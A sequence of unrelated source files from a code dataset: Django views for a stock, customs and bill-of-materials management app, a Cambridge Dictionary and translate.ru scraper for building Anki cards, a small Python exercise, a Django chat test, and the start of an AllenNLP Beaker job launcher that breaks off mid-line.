queryset.delete()\n return redirect('list_items')\n return render(request, 'stocksmanagement/confirm_delete.html', {\"title\": 'Confirm delete'})\n\n\n@login_required\ndef stock_detail(request, pk):\n queryset = Stock.objects.get(id=pk)\n context = {\n \"title\": queryset.item_name,\n \"queryset\": queryset,\n }\n return render(request, \"stocksmanagement/stock_detail.html\", context)\n\n\ndef check_format(df):\n format = ['Item Acount Description', 'Item', 'Mã Ecus', 'Item Description',\n 'Quantity', 'Amount', 'Price', 'Quantity.1', 'Amount.1', 'Price.1',\n 'Quantity.2', 'Amount.2', 'Price.2', 'Quantity.3', 'Amount.3',\n 'Price.3', 'Quantity.4', 'Amount.4', 'Price.4', 'Quantity.5',\n 'Amount.5', 'Price.5', 'Quantity.6', 'Amount.6', 'Price.6',\n 'Quantity.7', 'Amount.7', 'Price.7', 'Quantity.8', 'Amount.8',\n 'Price.8', 'Quantity.9', 'Amount.9', 'Price.9']\n set1 = set(format)\n set2 = set(df.columns.tolist())\n is_subset = set1.issubset(set2)\n if not is_subset:\n return False\n return True\n\n\n@login_required\ndef import_excel(request):\n if request.method == 'POST':\n try:\n file_name = request.FILES['myfile']\n except MultiValueDictKeyError:\n messages.warning(request, 'Please choose your file')\n return redirect('import_excel')\n try:\n imported_data = pd.read_excel(\n file_name.read(), header=10, sheet_name='IOB')\n except Exception:\n messages.warning(\n request, \"Wrong format, please make sure the file you input is excel and the sheet contain information name 'IOB'\")\n return redirect('import_excel')\n if check_format(imported_data):\n imported_data.fillna(method='ffill', inplace=True)\n for _, row in imported_data.iterrows():\n item = Stock(client=request.user)\n\n if row['Item Acount Description']:\n item.description = row['Item Acount Description'],\n if row['Item']:\n item.item_name = row['Item']\n if row['Mã Ecus']:\n item.ecus_code = row['Mã Ecus']\n if row['Item Description']:\n item.item_desciption = row['Item Description']\n if row['Quantity']:\n item.begin_quantity = row['Quantity']\n if row['Price']:\n item.begin_price = row['Price']\n if row['Quantity.1']:\n item.pr_purchase_quantity = row['Quantity.1']\n if row['Amount.1']:\n item.pr_purchase_price = row['Amount.1']\n if row['Quantity.2']:\n item.mr_production_quantity = row['Quantity.2']\n if row['Amount.2']:\n item.mr_production_price = row['Amount.2']\n if row['Quantity.3']:\n item.or_unplanned_quantity = row['Quantity.3']\n if row['Amount.3']:\n item.or_unplanned_price = row['Amount.3']\n if row['Quantity.4']:\n item.stock_transfer_quantity = row['Quantity.4']\n if row['Amount.4']:\n item.stock_transfer_price = row['Amount.4']\n if row['Quantity.5']:\n item.pi_issue_production_quantity = row['Quantity.5']\n if row['Amount.5']:\n item.pi_issue_production_price = row['Amount.5']\n if row['Quantity.6']:\n item.di_sale_issue_quantity = row['Quantity.6']\n if row['Amount.6']:\n item.di_sale_issue_price = row['Amount.6']\n if row['Quantity.7']:\n item.oi_unplanned_issue_quantity = row['Quantity.7']\n if row['Amount.7']:\n item.oi_unplanned_issue_price = row['Amount.7']\n if row['Quantity.8']:\n item.stock_transfer_issue_quantity = row['Quantity.8']\n if row['Amount.8']:\n item.stock_transfer_issue_price = row['Amount.8']\n item.save()\n messages.success(request, 'Data Imported')\n return redirect('list_items')\n else:\n messages.warning(request, '''Wrong format, please make sure the excel table contains at least these columns ['Item Acount Description', 'Item', 'Mã Ecus', 'Item Description',\n 'Quantity', 'Amount', 'Price', 'Quantity.1', 'Amount.1', 'Price.1',\n 'Quantity.2', 'Amount.2', 'Price.2', 'Quantity.3', 'Amount.3',\n 'Price.3', 'Quantity.4', 'Amount.4', 'Price.4', 'Quantity.5',\n 'Amount.5', 'Price.5', 'Quantity.6', 'Amount.6', 'Price.6',\n 'Quantity.7', 'Amount.7', 'Price.7', 'Quantity.8', 'Amount.8',\n 'Price.8', 'Quantity.9', 'Amount.9', 'Price.9']''')\n return redirect('import_excel')\n return render(request, 'stocksmanagement/import_excel.html', {'title': 'Import as excel'})\n\n\n['Item Acount Description', 'Item', 'Mã Ecus', 'Item Description',\n 'Quantity', 'Amount', 'Price', 'Quantity.1', 'Amount.1', 'Price.1',\n 'Quantity.2', 'Amount.2', 'Price.2', 'Quantity.3', 'Amount.3',\n 'Price.3', 'Quantity.4', 'Amount.4', 'Price.4', 'Quantity.5',\n 'Amount.5', 'Price.5', 'Quantity.6', 'Amount.6', 'Price.6',\n 'Quantity.7', 'Amount.7', 'Price.7', 'Quantity.8', 'Amount.8',\n 'Price.8', 'Quantity.9', 'Amount.9', 'Price.9']\n\n\n'''----------ECUS---------'''\n\n\nclass EcusListView(LoginRequiredMixin, ListView):\n model = Ecus\n template_name = 'stocksmanagement/list_ecus.html'\n context_object_name = 'queryset'\n ordering = ['-registered_date']\n paginate_by = 20\n query_set = None\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context['title'] = 'Ecus'\n return context\n\n def get_queryset(self):\n self.query_set = Ecus.objects.all().filter(client=self.request.user)\n type_code = self.request.GET.get('type_code', '')\n from_country = self.request.GET.get('from_country', '')\n if type_code:\n self.query_set = self.query_set.filter(\n type_code__icontains=type_code\n )\n if from_country:\n self.query_set = self.query_set.filter(\n from_country__icontains=from_country\n )\n return self.query_set\n\n\n@login_required\ndef export_csv_ecus(request):\n query_set = Ecus.objects.all().filter(client=request.user)\n type_code = request.GET.get('type_code', '')\n from_country = request.GET.get('from_country', '')\n content_disposition = 'attachment; filename=\"Ecus'\n if type_code:\n query_set = query_set.filter(\n type_code__icontains=type_code\n )\n content_disposition += f' - {type_code}'\n if from_country:\n query_set = query_set.filter(\n from_country__icontains=from_country\n )\n content_disposition += f' - {from_country}'\n content_disposition += '.csv\"'\n response = HttpResponse(content_type='text/csv')\n response['Content-Disposition'] = content_disposition\n writer = csv.writer(response)\n writer.writerow([\n 'Account Number',\n 'Registered Date',\n 'Type Code',\n 'Goods No',\n 'NPL/SP Code',\n 'ERP Code',\n 'HS',\n 'Item Name',\n 'Country',\n 'Unit Price',\n 'Taxed Price',\n 'Total',\n 'Unit',\n 'Total 2',\n 'Unit 2',\n 'NT value',\n 'Total value',\n 'Tax rate',\n 'Tax cost',\n 'Partner',\n 'Bill',\n 'Bill date',\n 'Contract',\n 'Contract date'\n ])\n for stock in query_set:\n writer.writerow(\n [\n stock.account_number,\n stock.registered_date,\n stock.type_code,\n stock.goods_no,\n stock.npl_sp_code,\n stock.erp_code,\n stock.hs,\n stock.item_name,\n stock.from_country,\n stock.unit_price,\n stock.unit_price_taxed,\n stock.total,\n stock.unit,\n stock.total_2,\n stock.unit_2,\n stock.nt_value,\n stock.total_value,\n stock.tax_rate,\n stock.tax_cost,\n stock.partner,\n stock.bill,\n stock.bill_date,\n stock.contract,\n stock.contract_date\n ]\n )\n return response\n\n\n@login_required\ndef update_ecus(request, pk):\n queryset = Ecus.objects.get(id=pk)\n form = EcusUpdateForm(instance=queryset)\n if request.method == 'POST':\n form = EcusUpdateForm(request.POST, instance=queryset)\n if form.is_valid():\n form.save()\n return redirect('list_ecus')\n\n context = {\n 'title': 'Update Item',\n 'form': form\n }\n return render(request, \"stocksmanagement/add_items.html\", context)\n\n\ndef check_ecus_format(df):\n format = ['Số TK', 'Ngày ĐK', 'Mã loại hình', 'STT hàng', 'Mã NPL/SP', 'Mã ERP', 'Mã HS', 'Tên hàng', 'Xuất xứ', 'Đơn giá', 'Đơn giá tính thuế', 'Tổng số lượng', 'Đơn vị tính',\n 'Tổng số lượng 2', 'Đơn vị tính 2', 'Trị giá NT', 'Tổng trị giá', 'Thuế suất XNK', 'Tiền thuế XNK', 'Tên đối tác', 'Số hóa đơn', 'Ngày hóa đơn', 'Số hợp đồng', 'Ngày hợp đồng']\n set1 = set(format)\n set2 = set(df.columns.tolist())\n is_subset = set1.issubset(set2)\n if not is_subset:\n return False\n return True\n\n\n@login_required\ndef import_excel_ecus(request):\n if request.method == 'POST':\n try:\n file_name = request.FILES['myfile']\n except MultiValueDictKeyError:\n messages.warning(request, 'Please choose your file')\n return redirect('import_excel_ecus')\n try:\n imported_data = pd.read_excel(\n file_name.read(), sheet_name='Ecus')\n except Exception:\n messages.warning(\n request, 'Wrong format, make sure the files you import is excel file and the sheet contain informations name Ecus')\n return render(request, 'stocksmanagement/import_excel.html')\n if check_ecus_format(imported_data):\n for _, row in imported_data.iterrows():\n item = Ecus(client=request.user)\n if not pd.isna(row['Số TK']):\n item.account_number = row['Số TK']\n if not pd.isna(row['Ngày ĐK']):\n item.registered_date = row['Ngày ĐK'].date()\n if not pd.isna(row['Mã loại hình']):\n item.type_code = row['Mã loại hình']\n if not pd.isna(row['STT hàng']):\n item.goods_no = row['STT hàng']\n if not pd.isna(row['Mã NPL/SP']):\n item.npl_sp_code = row['Mã NPL/SP']\n if not pd.isna(row['Mã ERP']):\n item.erp_code = row['Mã ERP']\n if not pd.isna(row['Mã HS']):\n item.hs = row['Mã HS']\n if not pd.isna(row['Tên hàng']):\n item.item_name = row['Tên hàng']\n if not pd.isna(row['Xuất xứ']):\n item.from_country = row['Xuất xứ']\n if not pd.isna(row['Đơn giá']):\n item.unit_price = row['Đơn giá']\n if not pd.isna(row['Đơn giá tính thuế']):\n item.unit_price_taxed = row['Đơn giá tính thuế']\n if not pd.isna(row['Tổng số lượng']):\n item.total = row['Tổng số lượng']\n if not pd.isna(row['Đơn vị tính']):\n item.unit = row['Đơn vị tính']\n if not pd.isna(row['Tổng số lượng 2']):\n item.total_2 = row['Tổng số lượng 2']\n if not pd.isna(row['Đơn vị tính 2']):\n item.unit_2 = row['Đơn vị tính 2']\n if not pd.isna(row['Trị giá NT']):\n item.nt_value = row['Trị giá NT']\n if not pd.isna(row['Tổng trị giá']):\n item.total_value = row['Tổng trị giá']\n if not pd.isna(row['Thuế suất XNK']):\n item.tax_rate = row['Thuế suất XNK']\n if not pd.isna(row['Tiền thuế XNK']):\n item.tax_cost = row['Tiền thuế XNK']\n if not pd.isna(row['Tên đối tác']):\n item.partner = row['Tên đối tác']\n if not pd.isna(row['Số hóa đơn']):\n item.bill = row['Số hóa đơn']\n if not pd.isna(row['Ngày hóa đơn']):\n item.bill_date = row['Ngày hóa đơn'].date()\n if not pd.isna(row['Số hợp đồng']):\n item.contract = row['Số hợp đồng']\n if not pd.isnull(row['Ngày hợp đồng']):\n item.contract_date = row['Ngày hợp đồng'].date()\n item.save()\n messages.success(request, 'Data Imported')\n return redirect('list_ecus')\n else:\n messages.warning(request, '''Wrong format, make sure your file has at least these column ['Số TK', 'Ngày ĐK', 'Mã loại hình', 'STT hàng', 'Mã NPL/SP', 'Mã ERP', 'Mã HS', 'Tên hàng', 'Xuất xứ', 'Đơn giá', 'Đơn giá tính thuế', 'Tổng số lượng', 'Đơn vị tính',\n 'Tổng số lượng 2', 'Đơn vị tính 2', 'Trị giá NT', 'Tổng trị giá', 'Thuế suất XNK', 'Tiền thuế XNK', 'Tên đối tác', 'Số hóa đơn', 'Ngày hóa đơn', 'Số hợp đồng', 'Ngày hợp đồng']''')\n return redirect('import_excel_ecus')\n return render(request, 'stocksmanagement/import_excel.html', {'title': 'Import as excel'})\n\n\n@login_required\ndef add_items_ecus(request):\n form = EcusCreateForm(request.POST or None)\n if form.is_valid():\n instance = form.save(commit=False)\n instance.client = request.user\n instance.save()\n messages.success(request, 'Successfully Saved')\n return redirect('list_ecus')\n context = {\n \"form\": form,\n \"title\": \"Add Ecus\",\n }\n return render(request, \"stocksmanagement/add_items.html\", context)\n\n\n@login_required\ndef delete_items_ecus(request, pk):\n queryset = Ecus.objects.get(id=pk)\n if request.method == 'POST':\n queryset.delete()\n return redirect('list_ecus')\n return render(request, 'stocksmanagement/confirm_delete_ecus.html', {'title': 'Confirm delete'})\n\n\n@login_required\ndef ecus_detail(request, pk):\n queryset = Ecus.objects.get(id=pk)\n context = {\n \"title\": queryset.item_name,\n \"queryset\": queryset,\n }\n return render(request, \"stocksmanagement/ecus_detail.html\", context)\n\n\n'''------------BOM------------'''\n\n\nclass BOMListView(LoginRequiredMixin, ListView):\n model = BOM\n template_name = 'stocksmanagement/list_bom.html'\n context_object_name = 'queryset'\n # ordering = ['-date_posted']\n paginate_by = 20\n query_set = None\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context['form'] = BOMSearchForm(self.request.GET)\n context['title'] = 'BOM'\n return context\n\n def get_queryset(self):\n self.query_set = BOM.objects.all().filter(client=self.request.user)\n ecus_code = self.request.GET.get('ecus_code', '')\n tp_code = self.request.GET.get('tp_code', '')\n ecus = self.request.GET.get('ecus', '')\n if ecus_code:\n self.query_set = self.query_set.filter(\n ecus_code__icontains=ecus_code\n )\n if tp_code:\n self.query_set = self.query_set.filter(\n tp_code__icontains=tp_code\n )\n if ecus:\n self.query_set = self.query_set.filter(\n ecus__icontains=ecus\n )\n return self.query_set\n\n\n@login_required\ndef export_csv_bom(request):\n query_set = BOM.objects.all().filter(client=request.user)\n ecus_code = request.GET.get('ecus_code', '')\n tp_code = request.GET.get('tp_code', '')\n content_disposition = 'attachment; filename=\"BOM'\n if ecus_code:\n query_set = query_set.filter(\n ecus_code__icontains=ecus_code\n )\n content_disposition += f' - {ecus_code}'\n if tp_code:\n query_set = query_set.filter(\n tp_code__icontains=tp_code\n )\n content_disposition += f' - {tp_code}'\n content_disposition += '.csv\"'\n response = HttpResponse(content_type='text/csv')\n response['Content-Disposition'] = content_disposition\n writer = csv.writer(response)\n writer.writerow(\n [\n 'Code TP',\n 'Ecus Code',\n 'Name',\n 'Decription',\n 'Unit',\n 'Ecus',\n 'Name 2',\n 'Decription',\n 'Unit',\n 'BOM',\n 'Loss',\n 'Thành phẩm xuất',\n 'Quy đổi TP xuất',\n 'Thành phẩm tồn',\n 'Quy đổi thành phẩm tồn'\n ]\n )\n for stock in query_set:\n writer.writerow(\n [\n stock.tp_code,\n stock.ecus_code,\n stock.name,\n stock.description,\n stock.unit,\n stock.ecus,\n stock.name_2,\n stock.description_2,\n stock.unit_2,\n stock.bom,\n stock.loss,\n stock.finish_product,\n stock.finish_product_convert,\n stock.finish_product_inventory,\n stock.finish_product_exchange\n ]\n )\n return response\n\n\n@login_required\ndef update_bom(request, pk):\n queryset = BOM.objects.get(id=pk)\n form = BOMUpdateForm(instance=queryset)\n if request.method == 'POST':\n form = BOMUpdateForm(request.POST, instance=queryset)\n if form.is_valid():\n form.save()\n return redirect('list_bom')\n\n context = {\n 'title': 'Add item',\n 'form': form\n }\n return render(request, \"stocksmanagement/add_items.html\", context)\n\n\ndef check_bom_format(df):\n format = ['Code TP', 'Mã Ecus', 'Tên', 'Decription', 'Unit', 'RM.code',\n 'Ecus code', 'Name', 'Decription.1', 'Unit.1', 'BOM', 'Loss', 'Thành phẩm xuất', 'Quy đổi TP xuất', 'Thành phẩm tồn',\n 'Quy đổi thành phẩm tồn']\n set1 = set(format)\n set2 = set(df.columns.tolist())\n is_subset = set1.issubset(set2)\n if not is_subset:\n return False\n return True\n\n\n@login_required\ndef import_excel_bom(request):\n if request.method == 'POST':\n try:\n file_name = request.FILES['myfile']\n except MultiValueDictKeyError:\n messages.warning(request, 'Please choose your file')\n return redirect('import_excel_bom')\n try:\n imported_data = pd.read_excel(\n file_name.read(), sheet_name='BOM')\n except Exception:\n messages.warning(\n request, 'Wrong format, make sure the file you import is excel and the sheet contain informations name BOM')\n return render(request, 'stocksmanagement/import_excel.html')\n if check_bom_format(imported_data):\n imported_data = imported_data.iloc[1:, :]\n for _, row in imported_data.iterrows():\n item = BOM(client=request.user)\n if not pd.isna(row['Code TP']):\n item.tp_code = row['Code TP']\n if not pd.isna(row['Mã Ecus']):\n item.ecus_code = row['Mã Ecus']\n if not pd.isna(row['Tên']):\n item.name = row['Tên']\n if not pd.isna(row['Decription']):\n item.rm_code = row['Decription']\n if not pd.isna(row['Unit']):\n item.description = row['Unit']\n if not pd.isna(row['RM.code']):\n item.unit = row['RM.code']\n if not pd.isna(row['Ecus code']):\n item.ecus = row['Ecus code']\n if not pd.isna(row['Name']):\n item.name_2 = row['Name']\n if not pd.isna(row['Decription.1']):\n item.description_2 = row['Decription.1']\n if not pd.isna(row['Unit.1']):\n item.unit_2 = row['Unit.1']\n if not pd.isna(row['BOM']):\n item.bom = row['BOM']\n if not pd.isna(row['Loss']):\n item.loss = row['Loss']\n if not pd.isna(row['Thành phẩm xuất']):\n item.finish_product = row['Thành phẩm xuất']\n if not pd.isna(row['Quy đổi TP xuất']):\n item.finish_product_convert = row['Quy đổi TP xuất']\n if not pd.isna(row['Thành phẩm tồn']):\n item.finish_product_inventory = row['Thành phẩm tồn']\n if not pd.isna(row['Quy đổi thành phẩm tồn']):\n item.finish_product_exchange = row['Quy đổi thành phẩm tồn']\n item.save()\n messages.success(request, 'Data Imported')\n return redirect('list_bom')\n else:\n messages.warning(request, '''\n Wrong format, make sure table has at least these columns:\n 'Code TP', 'Mã Ecus', 'Tên', 'Decription', 'Unit', 'RM.code',\n 'Ecus code', 'Name', 'Decription.1', 'Unit.1', 'BOM', 'Loss', \n 'Thành phẩm xuất', 'Quy đổi TP xuất', 'Thành phẩm tồn',\n 'Quy đổi thành phẩm tồn' \n ''')\n return redirect('import_excel_bom')\n return render(request, 'stocksmanagement/import_excel.html', {'title': 'Import as excel'})\n\n\n['Code TP', 'Mã Ecus', 'Tên', 'Decription', 'Unit', 'RM.code',\n 'Ecus code', 'Name', 'Decription.1', 'Unit.1', 'BOM', 'Loss',\n 'BOM + Loss', 'Thành phẩm xuất', 'Quy đổi TP xuất', 'Thành phẩm tồn',\n 'Quy đổi thành phẩm tồn']\n\n\n@login_required\ndef add_items_bom(request):\n form = BOMCreateForm(request.POST or None)\n if form.is_valid():\n instance = form.save(commit=False)\n instance.client = request.user\n instance.save()\n messages.success(request, 'Successfully Saved')\n return redirect('list_bom')\n context = {\n \"form\": form,\n \"title\": \"Add Item\",\n }\n return render(request, \"stocksmanagement/add_items.html\", context)\n\n\n@login_required\ndef delete_items_bom(request, pk):\n queryset = BOM.objects.get(id=pk)\n if request.method == 'POST':\n queryset.delete()\n return redirect('list_items_bom')\n return render(request, 'stocksmanagement/confirm_delete_bom.html', {'title': 'Confirm delete'})\n\n\n@login_required\ndef bom_detail(request, pk):\n queryset = BOM.objects.get(id=pk)\n context = {\n \"title\": queryset.name,\n \"queryset\": queryset,\n }\n return render(request, \"stocksmanagement/bom_detail.html\", context)\n\n\nclass BalanceListView(LoginRequiredMixin, ListView):\n model = Balance\n template_name = 'stocksmanagement/list_balance.html'\n context_object_name = 'queryset'\n # ordering = ['-date_posted']\n paginate_by = 20\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context['form'] = BalanceSearchForm(self.request.GET)\n context['title'] = 'Balance'\n return context\n\n def get_queryset(self):\n query_set = Balance.objects.all().filter(client=self.request.user)\n ecus_code = self.request.GET.get('ecus_code', '')\n description = self.request.GET.get('description', '')\n if ecus_code:\n query_set = query_set.filter(\n ecus_code__icontains=ecus_code\n )\n if description:\n query_set = query_set.filter(\n description__icontains=description\n )\n return query_set\n\n\n@login_required\ndef export_csv_balance(request):\n query_set = Balance.objects.all().filter(client=request.user)\n ecus_code = request.GET.get('ecus_code', '')\n description = request.GET.get('description', '')\n content_disposition = 'attachment; filename=\"Balance'\n if ecus_code:\n query_set = query_set.filter(\n ecus_code__icontains=ecus_code\n )\n content_disposition += f' - {ecus_code}'\n if description:\n query_set = query_set.filter(\n description__icontains=description\n )\n content_disposition += f' - {description}'\n content_disposition += '.xlsx\"'\n output = StringIO()\n workbook = xlsxwriter.Workbook(output)\n worksheet = workbook.add_worksheet()\n worksheet.write('ERP code',\n 'Ecus Code',\n 'Decription',\n 'E21',\n 'B13',\n 'A42',\n 'E52',\n 'RM Stock',\n 'FG Stock',\n 'WIP',\n 'BALANCE')\n\n for stock in query_set:\n worksheet.write(\n [\n stock.erp_code,\n stock.ecus_code,\n stock.description,\n stock.e21,\n stock.b13,\n stock.a42,\n stock.e52,\n stock.rm_stock,\n stock.fg_stock,\n stock.wip_stock,\n stock.get_balance()\n ]\n )\n\n workbook.close()\n response = HttpResponse(content_type='application/vnd.ms-excel')\n response['Content-Disposition'] = content_disposition\n response.write(output.getvalue())\n return response\n\n # query_set = Balance.objects.all().filter(client=request.user)\n # ecus_code = request.GET.get('ecus_code', '')\n # description = request.GET.get('description', '')\n # content_disposition = 'attachment; filename=\"Balance'\n # if ecus_code:\n # query_set = query_set.filter(\n # ecus_code__icontains=ecus_code\n # )\n # content_disposition += f' - {ecus_code}'\n # if description:\n # query_set = query_set.filter(\n # description__icontains=description\n # )\n # content_disposition += f' - {description}'\n # content_disposition += '.csv\"'\n # response = HttpResponse(content_type='text/csv')\n # response['Content-Disposition'] = content_disposition\n # writer = csv.writer(response)\n # writer.writerow(\n # [\n # 'ERP code',\n # 'Ecus Code',\n # 'Decription',\n # 'E21',\n # 'B13',\n # 'A42',\n # 'E52',\n # 'RM Stock',\n # 'FG Stock',\n # 'WIP',\n # 'BALANCE',\n # ]\n # )\n # for stock in query_set:\n # writer.writerow(\n # [\n # stock.erp_code,\n # stock.ecus_code,\n # stock.description,\n # stock.e21,\n # stock.b13,\n # stock.a42,\n # stock.e52,\n # stock.rm_stock,\n # stock.fg_stock,\n # stock.wip_stock,\n # stock.get_balance()\n # ]\n # )\n # return response\n","repo_name":"trinhvanminh/uni-dev","sub_path":"stocksmanagement/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":35079,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"1685071917","text":"import csv\nimport re\nimport requests\nfrom bs4 import BeautifulSoup\n\n\ndef check_text(message):\n text = message.text\n flag = True\n if ' ' in text:\n fail_message = 'Напишите только 1 слово'\n flag = False\n elif re.search(r'[^a-zA-Zа]', text):\n fail_message = 'Используйте только английские буквы'\n flag = False\n elif len(text) == 1:\n fail_message = 'Минимум 2 буквы'\n flag = False\n else:\n try:\n headers = {\n 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',\n 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36'\n }\n\n url = f'https://dictionary.cambridge.org/us/dictionary/english/{text}'\n\n html = requests.get(url, headers=headers)\n soup = BeautifulSoup(html.text, features='html.parser')\n\n final_keyword = soup.find('span', class_='hw dhw') # Получаем слово в простой форме\n final_keyword_string = final_keyword.string\n fail_message = 'Ошибок нет'\n\n except AttributeError:\n fail_message = 'Такого слова нет'\n flag = False\n\n return flag, fail_message\n\n\ndef get_data_from_cambridge(word_data, message):\n ''' Получаем данные о слове на Cambridge Dictionary:\n – Слово в простой форме\n – Произношение в .mp3 '''\n\n keyword = message.text.lower()\n\n headers = {\n 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',\n 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36'\n }\n\n url = f'https://dictionary.cambridge.org/us/dictionary/english/{keyword}'\n\n html = requests.get(url, headers=headers)\n soup = BeautifulSoup(html.text, features='html.parser')\n\n refined_keyword = soup.find('span', class_='hw dhw') # Получаем слово в простой форме\n keyword = refined_keyword.string\n\n search = soup.find_all(attrs={\"type\": \"audio/mpeg\"}, limit=1) # Скачиваем звук\n url_sound = 'https://dictionary.cambridge.org/' + str(search).replace('[<source src=\"/', '').replace('\" type=\"audio/mpeg\"/>]', '')\n\n response = requests.get(url_sound, headers=headers)\n with open(f'sounds/{keyword}.mp3', 'wb') as mp3:\n mp3.write(response.content)\n\n word_data.update({\n 'en': keyword,\n })\n\n return word_data, keyword\n\n\ndef get_data_from_promt(word_data, keyword):\n ''' Получаем данные о слове на Cambridge Dictionary:\n – Перевод на ру\n – Транскрипция произношения\n – Часть речи\n – Спрежение\n – Пример фраз на англ\n – Перевод фраз ан ру '''\n\n headers = {\n 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',\n 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36'\n }\n\n url = f'https://www.translate.ru/%D0%BF%D0%B5%D1%80%D0%B5%D0%B2%D0%BE%D0%B4/%D0%B0%D0%BD%D0%B3%D0%BB%D0%B8%D0%B9%D1%81%D0%BA%D0%B8%D0%B9-%D1%80%D1%83%D1%81%D1%81%D0%BA%D0%B8%D0%B9/{keyword}'\n\n html = requests.get(url, headers=headers)\n soup = BeautifulSoup(html.text, features='html.parser')\n\n translate = soup.find_all('span', class_='result_only sayWord', limit=2) # Получаем русские слова\n words_list = []\n for word in translate:\n words_list.append(word.string)\n ru_words = ', '.join(words_list)\n\n try:\n part_of_speech = soup.find('span', class_='ref_psp') # Получаем часть речи\n part_of_speech_string = part_of_speech.string\n except:\n part_of_speech_string = ''\n\n try:\n other_forms = soup.find('div', class_='otherImportantForms') # Получаем спряжения\n other_forms_string = other_forms.string.strip()\n except:\n other_forms_string = ''\n\n en_phrases_list = []\n phrases_en = soup.find_all('div', class_='samSource', limit=2) # Получаем английские фразы\n for phrase in phrases_en:\n a = str(phrase)\n a = a.replace('<div class=\"samSource\"><span style=\"color:#14426f\">', '').replace(' class=\"sourceSampleSearch\"', \"\").replace('.</span></div>', '').replace('span', 'b').replace('</div>', '')\n en_phrases_list.append(a)\n\n ru_phrases_list = []\n phrases_ru = soup.find_all('div', class_='samTranslation', limit=2) # Получаем русские фразы\n for phrase in phrases_ru:\n a = str(phrase)\n a = a.replace('<div class=\"samTranslation\"><span>', '').replace(' class=\"sourceSampleSearch\"', '').replace('.</span></div>', '').replace('</div>', '').replace('span', 'b')\n ru_phrases_list.append(a)\n\n phrases = ''\n for i in range(len(en_phrases_list)):\n phrases += en_phrases_list[i] + '<br>' + ru_phrases_list[i] + '<br><br>'\n phrases = phrases[:-8]\n\n word_data.update({\n 'ru': ru_words,\n 'phrases': phrases,\n 'other_forms': other_forms_string,\n 'part_of_speech': part_of_speech_string,\n 'sounds': f'[sound:{keyword}.mp3]',\n })\n return word_data, keyword\n\n\ndef update_csv(word_data, message):\n csvfile = open(f'docs/{message.from_user.id}.csv', 'a', encoding='utf-8')\n c = csv.writer(csvfile)\n c.writerow(word_data.values())\n csvfile.close()\n\n\ndef main(message):\n while True:\n word_data = {}\n word_data, keyword = get_data_from_cambridge(word_data, message)\n word_data, keyword = get_data_from_promt(word_data, keyword)\n update_csv(word_data, message)\n return word_data\n","repo_name":"AlexKivaiko/Ankibot","sub_path":"entoankibot.py","file_name":"entoankibot.py","file_ext":"py","file_size_in_byte":6232,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"42423115112","text":"from math import sqrt\r\nfrom sys import argv\r\nclass Sample:\r\n def __init__(self,value):\r\n self.C=50\r\n self.H=30\r\n self.value=value\r\n \r\n \r\n def getString(self):\r\n self.listone=[]\r\n for i in self.value:\r\n self.result=sqrt(2 * self.C * int(i)/self.H)\r\n self.listone.append(round(self.result))\r\n print((self.listone))\r\n \r\n\r\nif __name__=='__main__':\r\n args=(argv[1:])\r\n val=args[0].split(',')\r\n print(args[0])\r\n print(type(args))\r\n print(type(val))\r\n obj=Sample(val)\r\n obj.getString()\r\n ","repo_name":"shubha-nanda/Python","sub_path":"scripts/sqrtpract.py","file_name":"sqrtpract.py","file_ext":"py","file_size_in_byte":597,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"41911999034","text":"import io\n\nfrom django.contrib.auth import get_user_model\n\nfrom rest_framework import status\nfrom rest_framework.test import APITestCase\n\nfrom chat.models import NewGroup\n\nclass ChatTestCase(APITestCase):\n @classmethod\n def setUpTestData(cls):\n get_user_model().objects.create()\n NewGroup.objects.create(group_name=\"g1\", group_description=\"d1\")\n\n def test_chat_creation(self):\n user = get_user_model().objects.first()\n group = NewGroup.objects.first()\n data = {\"sender\": user.id ,\"message\": \"how are you\", \"group_id\":group.id}\n response = self.client.post(\"/chat/chat/\", data)\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n\n @classmethod\n def tearDownClass(cls):\n get_user_model().objects.all().delete()\n NewGroup.objects.all().delete()","repo_name":"karthikkumar090/TestProject","sub_path":"TestProject/testproject/chat/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":828,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"72822878012","text":"#! /usr/bin/env python\n\n# Script to launch AllenNLP Beaker jobs.\n\nimport argparse\nimport os\nimport random\nimport subprocess\nimport sys\nfrom typing import List\n\nsys.path.insert(0, os.path.dirname(os.path.abspath(os.path.join(os.path.join(__file__, os.pardir), os.pardir))))\n\nfrom allennlp.commands.train import Train\nfrom allennlp.common.params import Params\n\ndef main(param_file: str, extra_beaker_commands: List[str]):\n ecr_repository = \"896129387501.dkr.ecr.us-west-2.amazonaws.com\"\n commit = subprocess.check_output([\"git\", \"rev-parse\", \"HEAD\"], universal_newlines=True).strip()\n image = f\"{ecr_repository}/allennlp/allennlp:{commit}\"\n overrides = \"\"\n\n # Reads params and sets environment.\n params = Params.from_file(param_file, overrides)\n flat_params = params.as_flat_dict()\n env = []\n for k, v in flat_params.items():\n k = str(k).replace('.', '_')\n env.append(f\"--env={k}={v}\")\n\n # If the git repository is dirty, add a random hash.\n result = subprocess.run('git diff-index --quiet HEAD --', 